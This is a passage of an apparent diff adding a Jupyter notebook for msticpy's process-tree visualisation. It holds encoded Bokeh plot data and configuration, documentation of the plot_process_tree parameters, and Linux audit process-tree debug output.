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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1010]}},\"selected\":{\"id\":\"1050\"},\"selection_policy\":{\"id\":\"1049\"}},\"id\":\"1003\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"ProcessTree\"},\"id\":\"1006\",\"type\":\"Title\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"1044\"},\"group\":null,\"major_label_policy\":{\"id\":\"1045\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1021\"},\"visible\":false},\"id\":\"1020\",\"type\":\"LinearAxis\"},{\"attributes\":{\"active_multi\":{\"id\":\"1119\"},\"tools\":[{\"id\":\"1098\"},{\"id\":\"1099\"},{\"id\":\"1100\"},{\"id\":\"1101\"},{\"id\":\"1102\"},{\"id\":\"1103\"},{\"id\":\"1119\"}]},\"id\":\"1105\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1158\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1008\"},\"value\":0.1},\"id\":\"1053\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1159\",\"type\":\"StringFormatter\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1040\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@NewProcessId\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TgtLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"range\":{\"id\":\"1010\"},\"value\":0.25},\"id\":\"1070\",\"type\":\"Dodge\"},{\"attributes\":{\"overlay\":{\"id\":\"1120\"},\"x_range\":null,\"y_range\":{\"id\":\"1010\"}},\"id\":\"1119\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1160\",\"type\":\"StringEditor\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"height\":{\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1037\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1069\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1070\"}}},\"id\":\"1072\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"1120\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1161\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1112\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1162\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1053\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1054\"}}},\"id\":\"1056\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1112\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1115\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1156\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1150\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1149\"},\"title\":\"SubjectLogonId\"},\"id\":\"1130\",\"type\":\"TableColumn\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1077\",\"type\":\"FixedTicker\"},{\"attributes\":{\"active_scroll\":{\"id\":\"1027\"},\"tools\":[{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"},{\"id\":\"1033\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1155\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1021\",\"type\":\"BasicTicker\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1068\",\"type\":\"CDSView\"},{\"attributes\":{\"editor\":{\"id\":\"1154\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1153\"},\"title\":\"NewProcessName\"},\"id\":\"1132\",\"type\":\"TableColumn\"},{\"attributes\":{\"end\":1011,\"start\":990},\"id\":\"1010\",\"type\":\"Range1d\"},{\"attributes\":{\"range\":{\"id\":\"1010\"},\"value\":-0.2},\"id\":\"1054\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1024\",\"type\":\"ResetTool\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1053\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1054\"}}},\"id\":\"1057\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1102\",\"type\":\"ResetTool\"},{\"attributes\":{\"range\":{\"id\":\"1008\"},\"value\":1.75},\"id\":\"1035\",\"type\":\"Dodge\"},{\"attributes\":{\"factors\":[\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"LOCAL SERVICE\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"1004\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"below\":[{\"id\":\"1016\"}],\"center\":[{\"id\":\"1019\"},{\"id\":\"1023\"},{\"id\":\"1051\"}],\"height\":700,\"left\":[{\"id\":\"1020\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"1040\"},{\"id\":\"1059\"},{\"id\":\"1067\"},{\"id\":\"1075\"}],\"title\":{\"id\":\"1006\"},\"toolbar\":{\"id\":\"1028\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"1008\"},\"x_scale\":{\"id\":\"1012\"},\"y_range\":{\"id\":\"1010\"},\"y_scale\":{\"id\":\"1014\"}},\"id\":\"1005\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1079\",\"type\":\"FixedTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1090\"},\"coordinates\":null,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"1093\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1086\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1171\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1172\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1174\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1091\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1175\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1082\",\"type\":\"DataRange1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1004\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1038\",\"type\":\"Rect\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"1174\"},\"group\":null,\"major_label_policy\":{\"id\":\"1175\"},\"ticker\":{\"id\":\"1091\"},\"visible\":false},\"id\":\"1090\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1049\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1088\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1050\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1048\",\"type\":\"AllLabels\"},{\"attributes\":{\"end\":1011,\"start\":-1},\"id\":\"1084\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1047\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1154\",\"type\":\"StringEditor\"}],\"root_ids\":[\"1140\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n  const render_items = [{\"docid\":\"442811e8-3378-4087-aa0f-563e02fa0971\",\"root_ids\":[\"1140\"],\"roots\":{\"1140\":\"7aecb075-6c8f-47ba-a6b5-63b149b2ff37\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    let attempts = 0;\n    const timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1140"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "(Figure(id='1005', ...), Column(id='1140', ...))"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ptree.plot_process_tree(data=win_procs, legend_col=\"SubjectUserName\", show_table=True, pid_fmt=\"dec\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Plotting Syntax\n",
+    "\n",
+    "plot_process_tree(\n",
+    "    data,\n",
+    "    schema=None,\n",
+    "    output_var=None,\n",
+    "    legend_colNone,\n",
+    "    show_table=False,\n",
+    ")\n",
+    "\n",
+    "### Parameter descriptions\n",
+    "\n",
+    "#### data : pd.DataFrame\n",
+    "\n",
+    "- DataFrame containing one or more Process Trees. This should be the output of `build_process_tree` described above.\n",
+    "\n",
+    "#### schema : ProcSchema, optional\n",
+    "\n",
+    "- The data schema to use for the data set, by default None.\n",
+    "  If None the schema is inferred. A schema object maps generic field names (e.g. `process_name`) on to a data-specific name (e.g. `exe` in the case of Linux audit data). This is usually not required since the function will try to infer the schema from fields in the input DataFrame.\n",
+    "\n",
+    "#### output_var : str, optional\n",
+    "\n",
+    "- Output variable for selected items in the tree, by default None.\n",
+    "  Setting this lets you return the keys of any items selected in the bokeh plot. For example, if you supply the string \"my_results\" and then select one or more processes in the tree, the Python variable `my_results` will be populated with a list of keys (index items) of the corresponding rows in the input DataFrame.\n",
+    "\n",
+    "#### legend_col : str, optional\n",
+    "\n",
+    "- The column used to color the tree items, by default None.\n",
+    "  If this column is a string, the values will be treated as categorical data and map unique values to different colors and display a legend of the mapping. If this column is a numeric or datetime value, the values will be treated as continuous and a color gradient bar will be displayed indicating the mapping of values on to the color gradient.\n",
+    "\n",
+    "#### show_table: bool\n",
+    "\n",
+    "- Set to True to show the data table, by default False.\n",
+    "  Shows the source values as a data table beneath the process tree.\n",
+    "\n",
+    "#### height : int, optional\n",
+    "\n",
+    "- The height of the plot figure\n",
+    "   (the default is 700)\n",
+    "\n",
+    "#### width : int, optional\n",
+    "\n",
+    "- The width of the plot figure (the default is 900)\n",
+    "\n",
+    "#### title : str, optional\n",
+    "\n",
+    "- Title to display (the default is None)\n",
+    "\n",
+    "#### hide_legend  : bool, optional\n",
+    "\n",
+    "- Hide the legend box, even if legend_col is specified.\n",
+    "\n",
+    "#### pid_fmt : str, optional\n",
+    "\n",
+    "- Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),\n",
+    "  default is 'hex'.\n",
+    "\n",
+    "---\n",
+    "\n",
+    "### Caveats\n",
+    "\n",
+    "#### Large data sets (more than a few hundred processses)\n",
+    "\n",
+    "These will normally be handled well by the Bokeh plot (up to multiple tens of thousands or more) but it will make navigation of the tree difficult. In particular, the range tool (on the right of the main plot) will be difficult to manipulate. Split the input data into smaller chunks before plotting.\n",
+    "\n",
+    "#### Font Size\n",
+    "\n",
+    "The font size does not scale based on how much data is shown. If you use the range tool to select too large a subset of the data in the main plot, the font will become unreadable. If this happens, use the `reset` tool to set the plot back to its defaults.\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Linux Process Tree\n",
+    "\n",
+    "**Note** This assumes that the Linux audit log has been read from a file using [msticpy.sectools.auditdextract.read_from_file()](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html#msticpy.sectools.auditdextract.read_from_file) or read from Azure Sentinel/Log Analytics using the LinuxAudit.auditd_all query and processed using [msticpy.sectools.auditdextract.extract_events_to_df()`](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html#msticpy.sectools.auditdextract.extract_events_to_df) function.\n",
+    "\n",
+    "Using either of these, the process exec events related to a single process start are merged into a single row.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:30.161996Z",
+     "start_time": "2020-08-25T15:53:29.916001Z"
+    },
+    "execution_event_id": "b292254e-8516-48a9-8d6b-efcf9c1df1a8",
+    "last_executed_text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)",
+    "persistent_id": "f60daf1c-6e02-437f-b160-119cabaf78ad",
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Original # procs 1000\n",
+      "Merged # procs 1000\n",
+      "Merged # procs - dropna 295\n",
+      "Unique merged_procs index in merge 1000\n",
+      "These two should add up to top line\n",
+      "Rows with dups 0\n",
+      "Rows with no dups 1000\n",
+      "0 + 1000 = 1000\n",
+      "original: 1000 inferred_parents 29 combined 1029\n",
+      "{'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n"
+     ]
+    }
+   ],
+   "source": [
+    "linux_proc = pd.read_pickle(\"data/linux_proc_test.pkl\")\n",
+    "p_tree_lx = ptree.build_process_tree(linux_proc, show_summary=True, debug=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:30.240997Z",
+     "start_time": "2020-08-25T15:53:30.163996Z"
+    }
+   },
+   "outputs": [
+    {
